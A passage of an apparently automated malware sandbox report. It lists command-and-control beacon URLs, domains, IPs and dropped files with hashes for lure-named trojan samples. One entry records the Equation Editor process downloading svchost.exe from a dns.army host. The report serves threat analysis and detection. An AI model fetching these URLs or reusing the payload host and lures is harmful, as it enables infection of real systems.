                                                                                                                                                              • www.athleteshive.com/gqx2/?BDKTpBQ=kdwz49RbWZyfRfVFqlgC7QJtxuB/meiNTkA5ikaSnjB/7w8EYdi6OSMNUeLU1PJtCjvO1w==&_L34=kt80IjmPWrI
                                                                                                                                                              JqldwsTQaf.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.h-v-biz.com/c8so/?r8d=hsMrMOU643mST3cG5BegBqlrTsujOywA7VDeUpBh8kj+UXdiOmAX38t6MAvoar1X++8s&2d=ofadAP
                                                                                                                                                              AOA4sx8Z7l.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.h-v-biz.com/c8so/?Wx=hsMrMOU643mST3cG5BegBqlrTsujOywA7VDeUpBh8kj+UXdiOmAX38t6MAvCFbFX680s&vB=lhr0E
                                                                                                                                                              g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.hyderabadcycles.com/nki/?-Z1l=MFw41kzKaXe0hopkE9vEEVraD/kcxnmgAUtIUpSB+IabrAt7HF2XrmKaxnDoXw1KRrQr1sHF0Q==&5ju=UlSpo
                                                                                                                                                              invoice.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • www.h-v-biz.com/c8so/?AFNDR=7n20cVCpbL7dqxQ&BBW=hsMrMOU/4wmWTnQK7BegBqlrTsujOywA7VbOIqdg4Ej/UmxkJ2Rbh4V4PlD+e7xk19hcsA==
                                                                                                                                                              SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.5396.rtfGet hashmaliciousBrowse
                                                                                                                                                              • www.refrigerator-repair.site/th9/?MbCdXj=gLBQc6LAjgBelJzUDnA1ifjvVom90JtjeQeqtqykqwUqccCdrhzeXd5elic3mQ5wzJ3gZA==&1bL0=nN6tXVY0-tVP_b
                                                                                                                                                              Quote.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.wertzdesign.com/0wdn/?Rl=YTcPK4th&M4sd6Lz8=2HMmMtqjuc6nZrnuEGhPzEdxvae1T2vatIozmsMTI7sg3WrZk08xAqAobd18yLb8isv8
                                                                                                                                                              ORDER 172IKL0153094.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.wertzdesign.com/0wdn/?4h3=2HMmMtqjuc6nZrnuEGhPzEdxvae1T2vatIozmsMTI7sg3WrZk08xAqAobeZGxK3HhbOtEHtdyQ==&vR-TR=LJEtYNu
                                                                                                                                                              sxNl6OeOPIJyE9q.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.ayngaranastro.com/zsh/?rZyXU8=sgb/rOlf1tKnXXoM/DPrHVMxTGIDzvb3kJ/Mqnd0YmVzk8g8LAL4juhSemC1lB2/VSph&Ezr0Av=apIHk6pX0pRXDj
                                                                                                                                                              Order Specifications With Ref Breve#T0876B96.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.querooo.com/utau/?DXOX-=XosT01q8/wjUwz/8oUOqvspYdEVF+Eatn/VvLCmWpcYk6JBAkfaWyI4ZAHjubdWk2QpC&KtxD=ZR-DOT9pJ
                                                                                                                                                              Breve-Tufvassons sp.o.o.o Company Profile And Bout Us.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.querooo.com/utau/?FZW42RP=XosT01q8/wjUwz/8oUOqvspYdEVF+Eatn/VvLCmWpcYk6JBAkfaWyI4ZAEP+HsKfxlATnT412Q==&Bb=hvLHMnt8_00
                                                                                                                                                              Breve-Tufvassons sp.o.o Company Profile And Bout Us.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.querooo.com/utau/?Cb=XosT01q8/wjUwz/8oUOqvspYdEVF+Eatn/VvLCmWpcYk6JBAkfaWyI4ZAHjEEtmkyShC&5j=xrFP8nbPQjXLN2Q
                                                                                                                                                              SWIFT_HSBC Bank.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.tudeladirecto.com/nt8e/?7nwltvxh=d5sTnujAaLwCHAV7Hkod4AGONRw1Ceya8p7QHyuAjU2hemaQC5CnvhOz2PxecLhIDM1S&org=3foxnfCXOnIhKD
                                                                                                                                                              Order Specification Requirement With Ref. AMABINIF38535.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.querooo.com/utau/?2dZ8=XosT01q8/wjUwz/8oUOqvspYdEVF+Eatn/VvLCmWpcYk6JBAkfaWyI4ZAHjubdWk2QpC&p64=8prxehCX
                                                                                                                                                              9qB3tPamJa.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.sotoki.com/cia6/?jFNl2N=bpRpCsMO2qDVShiOuD/b8wmJrZBgc2/kyAQwaLZZ5pMaG10zGD5FQ1ves+WOFEHgduiI&oX=_0Gxtp50WtBTh
                                                                                                                                                              34.102.136.180PAYMENT LIST .xlsxGet hashmaliciousBrowse
                                                                                                                                                              • www.kerifletcherrock.com/oean/?jvylC6k0=Opa2yxOMW+p6bOslAOO6h/1EkNB54ngFJAZHYsyvYxpw4UyGhwhjUO3aSMs8Sdr4Amozmg==&gnj80=CJBh7xO8zrtpcTq
                                                                                                                                                              quote20210126.exe.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.ribbonredwhiteandblue.com/dei5/?TZkpkdJ=g0K5ifwFWV09n7i1NEiFZbu/6tutLBAV6sI0nEyaQ7OZPYqcNrOHgfWcWl8srePs8/mI&U4kp=NtxLpLUP-vTH68s
                                                                                                                                                              SecuriteInfo.com.Trojan.Packed2.42783.14936.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.edu4go.com/bsl/?mt=meRO04KZ+tRueejEQ1mKApUC+xiZQAGZPTeO6WstMPZoEBgumINoRWRpGBFK3WkMjtLu&2d=hxlpdRkxCvtTgBzP
                                                                                                                                                              PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • www.worldwide-mt.com/kzd/
                                                                                                                                                              bXFjrxjRlb.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.what3emoji.com/bf3/?pPX=m4Qmgz02ndzlkmzRdXbnUnIUoJvahqq5/3ILTCGwMTubC4gHDN74yJVcJDUGCd+LoHuKsTQ0JA==&W6=jnKpRl-xV
                                                                                                                                                              xl2Ml2iNJe.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.ricardoinman.com/xle/?-ZnD=LjoXU6n8-&iBrlPD=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQV/txd+LHV0DSgDXQ==
                                                                                                                                                              v07PSzmSp9.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.jikzo.com/c8so/?3ff87=Bcwq9mo1SLdxGMzaDRBSbVH3gidTK8xbNEF8M/tGLQ2aKWcuDQCQFtxR7k1oF3yRZXKc&uZWD=XPmPajepJ2gdvnZ
                                                                                                                                                              NEW ORDER.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • www.simplifiedvirtualsolutions.com/oean/?MdLxlt=mKgmb7I6yODGcWmnOnDfCd0CfDEQGPBdVeZhKsaKMoR3Qh4v4CLN6oxN3p9trG3799qCow==&gnU4Pf=yZPLGZXHl
                                                                                                                                                              Inquiry_73834168_.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • www.kaiyuansu.pro/incn/?9r_PU=-ZQLEn&e2Jdlzf8=4y+UTKzAJ4dBlp/RYYS74WaP+qCjnKVRzK/jF/x906cXBmLcUo8gxmNUvdqUiR1QG2msPA==
                                                                                                                                                              winlog(1).exeGet hashmaliciousBrowse
                                                                                                                                                              • www.growingequity.fund/oean/?8pNhXv=yVML0zB0&u4XpH=VZAj6Grbo5w3dBd7w+9BSoe0Fg1VHX3dphJz9/egos9dVzX5qD6mqxE3tIZZ2ImCjS7epxmUBA==
                                                                                                                                                              win32.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.findthatsmartphone.com/incn/?8pBP5p=/AA5bjKPiaWw22bzCdt7lqNbxAyyPpv3elVlM12b4Zuyr5w4xH0F6TIfefQNvJyZz9qG&L6Ah=2dSLFXghYtFd0
                                                                                                                                                              1-26.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.catalogcardgames.net/bf3/?UXrxP8=0T3HW8l&URfXx=Sdh36sWiaQaHmuW5OuhNg2ZSKBobeXsq4DWTIDdmgtvI732RtscB8O3t4ssmBmGg4ghZ
                                                                                                                                                              Request.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • www.cleverwares.com/c8so/?Rf=P253+QYRdhKTDdzjq4pa7Wp7svBpTNddHFol+cUWSKGzAXl94gLhBIvIcI/Xp4fU197lMA==&LDHHp=z4D80PDX
                                                                                                                                                              INV_TMB_210567Y00.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • www.5050alberta.com/xle/?8pqhs=XuVPlIEgAAku+dXH+MR8cy20ZHkP0iJzlT7lKUj3PYBKa8v0bSmzSfHWFfmBCUSgIWFn2Q==&tDH=XRR8
                                                                                                                                                              RFQ.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • www.blacknation.info/c8so/?pBU=HzuD_&gb24XB=6ATEh1s0NdZErsRPIUioXmvz20sSLCkN4f+QHjKAbluYenOJN9FSbPt8XJ2H+dMMf4Jp2Q==
                                                                                                                                                              New Year Inquiry List.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • www.primeoneimplants.com/qjnt/?tB=TtdpPpppFvG&1bwhC=nh3Tl/oLs4HXZ5hiWyD3n36TA5+xQ+CwXb+KxfiJNOta6blp58Sj1H/LHtoCWuUTeWdwKg==
                                                                                                                                                              RF-E93-STD-068 SUPPLIES.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • www.harperandchloe.com/xle/?5jFlkJJh=FNtvxHF14RtgzuhKSaLd0lIzxL3LkdKZj/Q/Opos8UfLtbug0tkzhu0XdD0TouZ6I/qGUQ==&LR-T=vBK0GdQp
                                                                                                                                                              gPGTcEMoM1.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.ctfocbdwholesale.com/bw82/?W6=Rxta6xhtzzdBFDuy4SYKtO8XUaMinJcredo77YczPu8Lep1ecFiaWqXH8h2T5haNROfU&odeTY=cnxhAP6x
                                                                                                                                                              bgJPIZIYby.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.engageautism.info/bw82/?GFND=n1L9MQk6NEQOasYlfxU4KXziLGivOllQbNtATfsC4RjAZctNbAJfQ2EIxV87fcKcU54A&Rlj=YVIX8Hyx
                                                                                                                                                              vA0mtZ7JzJ.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.brainandbodystrengthcoach.com/csv8/?Mjklsrcx=4rzgp1jZc7l8Whg0IztLQnvubqNqMY/2oz5HEUeZ+SGIDqCjyjtIs6qqwwlb5soGHyjF&Hp0xlh=EVvxc8

                                                                                                                                                              Domains

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              mtk-lb-1470093426.us-west-2.elb.amazonaws.com1D1PBttduH.exeGet hashmaliciousBrowse
                                                                                                                                                              • 44.240.171.172
                                                                                                                                                              notice of arrival.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 35.162.176.29
                                                                                                                                                              www.athleteshive.comKuPBIsrqbO.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.197.91
                                                                                                                                                              1D1PBttduH.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.197.91
                                                                                                                                                              notice of arrival.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.197.91
                                                                                                                                                              arrival_notice.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.197.91
                                                                                                                                                              sndychnesqudusissnvx.dns.armyCI + PL.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 103.141.138.125
                                                                                                                                                              RFQ.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 103.141.138.125

                                                                                                                                                              ASN

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHKConsignment Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                                                                                                                              • 154.196.243.121
                                                                                                                                                              z6qKV40n75.exeGet hashmaliciousBrowse
                                                                                                                                                              • 154.196.150.25
                                                                                                                                                              XWW8KE7078.exeGet hashmaliciousBrowse
                                                                                                                                                              • 154.196.155.56
                                                                                                                                                              Purchase Order 75MF3B84_Pdf.exeGet hashmaliciousBrowse
                                                                                                                                                              • 154.196.155.60
                                                                                                                                                              PURCHASE ORDER_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                              • 154.196.155.60
                                                                                                                                                              CLxJeVvzMA.exeGet hashmaliciousBrowse
                                                                                                                                                              • 154.203.159.213
                                                                                                                                                              uqAU5Vneod.exeGet hashmaliciousBrowse
                                                                                                                                                              • 154.203.159.213
                                                                                                                                                              Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                              • 154.196.230.121
                                                                                                                                                              Mv Maersk Kleven V949E_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                              • 154.196.153.54
                                                                                                                                                              INV SF2910202.docGet hashmaliciousBrowse
                                                                                                                                                              • 154.196.151.2
                                                                                                                                                              New Additional Agreement.exeGet hashmaliciousBrowse
                                                                                                                                                              • 154.203.187.105
                                                                                                                                                              Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                                                                                                                                              • 154.203.159.79
                                                                                                                                                              Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                                                                                                                                              • 154.203.159.79
                                                                                                                                                              DEWA PROJECT 12100317.exeGet hashmaliciousBrowse
                                                                                                                                                              • 154.203.159.79
                                                                                                                                                              NOAH FORMBUK NEW_crypted.exeGet hashmaliciousBrowse
                                                                                                                                                              • 154.196.151.21
                                                                                                                                                              arrival notice-ETA 10th-11,2020.exeGet hashmaliciousBrowse
                                                                                                                                                              • 154.196.151.21
                                                                                                                                                              HPScan Payment 20.10.20.exeGet hashmaliciousBrowse
                                                                                                                                                              • 154.196.153.6
                                                                                                                                                              CNR11. xlsx.exeGet hashmaliciousBrowse
                                                                                                                                                              • 154.203.159.197
                                                                                                                                                              AMAZON-02USwno5UOP8TJ.exeGet hashmaliciousBrowse
                                                                                                                                                              • 52.211.215.209
                                                                                                                                                              quote20210126.exe.exeGet hashmaliciousBrowse
                                                                                                                                                              • 3.140.151.209
                                                                                                                                                              PAYMENT.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 34.251.154.69
                                                                                                                                                              PAYMENT.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 34.249.208.250
                                                                                                                                                              DHL eMailShip delivery Form - securedPDF.htmlGet hashmaliciousBrowse
                                                                                                                                                              • 52.218.216.224
                                                                                                                                                              5Ur5p5e8r2.exeGet hashmaliciousBrowse
                                                                                                                                                              • 13.52.79.18
                                                                                                                                                              The Mental Health Center.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 52.216.245.238
                                                                                                                                                              Inquiry_73834168_.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 3.131.104.217
                                                                                                                                                              Xy4f5rcxOm.dllGet hashmaliciousBrowse
                                                                                                                                                              • 54.64.30.175
                                                                                                                                                              New Year Inquiry List.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 13.224.102.114
                                                                                                                                                              gPGTcEMoM1.exeGet hashmaliciousBrowse
                                                                                                                                                              • 52.217.42.147
                                                                                                                                                              bgJPIZIYby.exeGet hashmaliciousBrowse
                                                                                                                                                              • 52.217.42.147
                                                                                                                                                              vA0mtZ7JzJ.exeGet hashmaliciousBrowse
                                                                                                                                                              • 99.83.185.45
                                                                                                                                                              xSfGet hashmaliciousBrowse
                                                                                                                                                              • 44.240.76.51
                                                                                                                                                              bin.shGet hashmaliciousBrowse
                                                                                                                                                              • 3.110.190.131
                                                                                                                                                              FileZilla_3.52.2_win64_sponsored-setup.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.204.94.23
                                                                                                                                                              PAYMENT INFO.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 52.16.136.30
                                                                                                                                                              PAYMENT INFO.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 52.214.73.151
                                                                                                                                                              Tebling_Resortsac_FILE-HP38XM.htmGet hashmaliciousBrowse
                                                                                                                                                              • 3.128.122.199
                                                                                                                                                              INC_Y5KPAYAWWU7.docGet hashmaliciousBrowse
                                                                                                                                                              • 13.248.196.204
                                                                                                                                                              CONFLUENCE-NETWORK-INCVGv07PSzmSp9.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.197.91
                                                                                                                                                              win32.exeGet hashmaliciousBrowse
                                                                                                                                                              • 204.11.56.48
                                                                                                                                                              Request.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.197.91
                                                                                                                                                              mitbjisfe.jsGet hashmaliciousBrowse
                                                                                                                                                              • 204.11.56.48
                                                                                                                                                              documents_0084568546754.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.197.27
                                                                                                                                                              D6mimHOcsr.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.197.27
                                                                                                                                                              KTFvWHZDMe.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.197.27
                                                                                                                                                              PO81105083.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.197.27
                                                                                                                                                              tuMCqH36OF.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.197.27
                                                                                                                                                              2021 DOCS.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.197.27
                                                                                                                                                              SecuriteInfo.com.Trojan.PackedNET.509.28611.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.197.27
                                                                                                                                                              Details...exeGet hashmaliciousBrowse
                                                                                                                                                              • 204.11.56.48
                                                                                                                                                              KuPBIsrqbO.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.197.91
                                                                                                                                                              Fdj5vhj87S.exeGet hashmaliciousBrowse
                                                                                                                                                              • 204.11.56.48
                                                                                                                                                              _MVSEASEAL_RFQ_.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 209.99.64.33
                                                                                                                                                              1D1PBttduH.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.197.91
                                                                                                                                                              Statement Of Account.exeGet hashmaliciousBrowse
                                                                                                                                                              • 204.11.56.48
                                                                                                                                                              yxYmHtT7uT.exeGet hashmaliciousBrowse
                                                                                                                                                              • 204.11.56.48
                                                                                                                                                              notice of arrival.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.197.91
                                                                                                                                                              SKM_C221200706052800.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.197.39

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              No context

                                                                                                                                                              Dropped Files

                                                                                                                                                              No context

                                                                                                                                                              Created / dropped Files

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
                                                                                                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):913408
                                                                                                                                                              Entropy (8bit):7.628923837789258
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:ccn9BTW0SInwr5acjYRX45X7sk3XUhRYTKSh4xi8FQiE/VwbN4+vtE+LtZ/NRMi5:nn9BTW0S5smX7RNhXFi0wqYTfV
                                                                                                                                                              MD5:2B72BC4BA9645AF5482661C5D1D1C7F8
                                                                                                                                                              SHA1:A32AE9352AB50A4576C8DCB8A1032A62AA235314
                                                                                                                                                              SHA-256:B3291D1F731C8E7408BBAE7E36242E7223D24D7B3EF0FA2B7F07950BE8DD3462
                                                                                                                                                              SHA-512:A83CD1E1091B80FD2868232C0FEC244C92F2A8626C92B21E1BF6F186DA616FAE5874609CE27C39A3F6AE70CCCE143C1E282FA78E2D21FBFB04B6693CD06FED7E
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              Reputation:low
                                                                                                                                                              IE Cache URL:http://sndychnesqudusissnvx.dns.army/documengt/svchost.exe
                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.................. ... ....@.. .......................`............@.................................d...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........C..$\...............b...........................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....op...(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*&..(1....*...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6885F643.jpeg
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):48770
                                                                                                                                                              Entropy (8bit):7.801842363879827
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                              MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                              SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                              SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                              SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                              Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\717D30CA.jpeg
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):48770
                                                                                                                                                              Entropy (8bit):7.801842363879827
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                              MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                              SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                              SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                              SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                              Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7BFBA2AD.emf
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):653280
                                                                                                                                                              Entropy (8bit):2.898620794957836
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3072:Z34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:R4UcLe0JOqQQZR8MDdATCR3tS+jqcC
                                                                                                                                                              MD5:ED1A38FF32F9806BA6BD58477BB8092C
                                                                                                                                                              SHA1:5F18F8D28F565776C8B678EE0F63E00BF044394C
                                                                                                                                                              SHA-256:7F1B7596D60F0825D6631764D5768B2697325A0667C78876B52A56C9F6F35BD1
                                                                                                                                                              SHA-512:3440133B213E53A823493ACBACB682C0D414D4FBFD6BB17C236542028D5389F4F5ACB95F47D9CF845A7F2C521DFC48A1FDF8F882988CF22C64EEB5F9B6E23C23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: ....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................'.4.'.......'...'..N.S..'...'.......'.|.'..N.S..'...'. ....yxP..'...'. ............zxP............................................X...%...7...................{ .@................C.a.l.i.b.r.............$.'.X.....'...'..2qP..........'...'..{oP....(.'.....dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                              C:\Users\user\Desktop\~$0113 INV_PAK.xlsx
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):330
                                                                                                                                                              Entropy (8bit):1.4377382811115937
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                              MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                              Malicious:true
                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                              C:\Users\Public\vbc.exe
                                                                                                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):913408
                                                                                                                                                              Entropy (8bit):7.628923837789258
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:ccn9BTW0SInwr5acjYRX45X7sk3XUhRYTKSh4xi8FQiE/VwbN4+vtE+LtZ/NRMi5:nn9BTW0S5smX7RNhXFi0wqYTfV
                                                                                                                                                              MD5:2B72BC4BA9645AF5482661C5D1D1C7F8
                                                                                                                                                              SHA1:A32AE9352AB50A4576C8DCB8A1032A62AA235314
                                                                                                                                                              SHA-256:B3291D1F731C8E7408BBAE7E36242E7223D24D7B3EF0FA2B7F07950BE8DD3462
                                                                                                                                                              SHA-512:A83CD1E1091B80FD2868232C0FEC244C92F2A8626C92B21E1BF6F186DA616FAE5874609CE27C39A3F6AE70CCCE143C1E282FA78E2D21FBFB04B6693CD06FED7E
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              Reputation:low
